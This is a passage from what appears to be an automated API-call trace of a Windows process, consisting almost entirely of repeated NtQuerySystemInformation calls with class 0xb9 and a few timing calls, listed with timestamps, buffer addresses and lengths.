Length=0x0, ResultLength=0x0) [0230.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x28, ResultLength=0x0) [0230.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x38, ResultLength=0x0) [0230.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x20, ResultLength=0x0) [0230.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x20, ResultLength=0x0) [0230.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x20, ResultLength=0x0) [0230.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x20, ResultLength=0x0) [0230.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x38, ResultLength=0x0) [0230.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x20, ResultLength=0x0) [0230.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x20, ResultLength=0x0) [0230.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x20, ResultLength=0x0) [0230.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.803] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc7520fd670 | out: lpSystemTimeAsFileTime=0xc7520fd670*(dwLowDateTime=0xead6ed7c, dwHighDateTime=0x1d5fb6e)) [0230.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x50, ResultLength=0x0) [0230.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd660, Length=0x28, ResultLength=0x0) [0230.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x50, ResultLength=0x0) [0230.803] GetTickCount () returned 0x117a3f3 [0230.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd448, Length=0x58, ResultLength=0x0) [0230.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x38, ResultLength=0x0) [0230.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0230.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0230.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0230.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0230.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd200, Length=0x28, ResultLength=0x0) [0230.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x38, ResultLength=0x0) [0230.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x28, ResultLength=0x0) [0230.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x28, ResultLength=0x0) [0230.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x38, ResultLength=0x0) [0230.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x20, ResultLength=0x0) [0230.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0230.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0230.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0230.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x38, ResultLength=0x0) [0230.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x20, ResultLength=0x0) [0230.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0230.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0230.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd448, Length=0x58, ResultLength=0x0) [0230.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0230.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0230.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0230.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0230.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0230.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x28, ResultLength=0x0) [0230.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0230.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0230.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x28, ResultLength=0x0) [0230.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x28, ResultLength=0x0) [0230.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0230.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0230.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x20, ResultLength=0x0) [0230.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0230.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0230.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0230.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x20, ResultLength=0x0) [0230.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0230.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x20, ResultLength=0x0) [0230.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0230.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0230.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0230.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0230.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x20, ResultLength=0x0) [0230.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0230.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0230.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0230.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0230.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x20, ResultLength=0x0) [0230.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0230.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0230.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd448, Length=0x58, ResultLength=0x0) [0230.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x58, ResultLength=0x0) [0230.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0230.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0230.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0230.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0230.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0230.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0230.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0230.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0230.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0230.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0230.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x20, ResultLength=0x0) [0230.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0230.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0230.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0230.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0230.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x20, ResultLength=0x0) [0230.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0230.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0230.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x58, ResultLength=0x0) [0230.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0230.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0230.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0230.873] NtQuerySystemInformation (SystemInformationClass=0xb9, 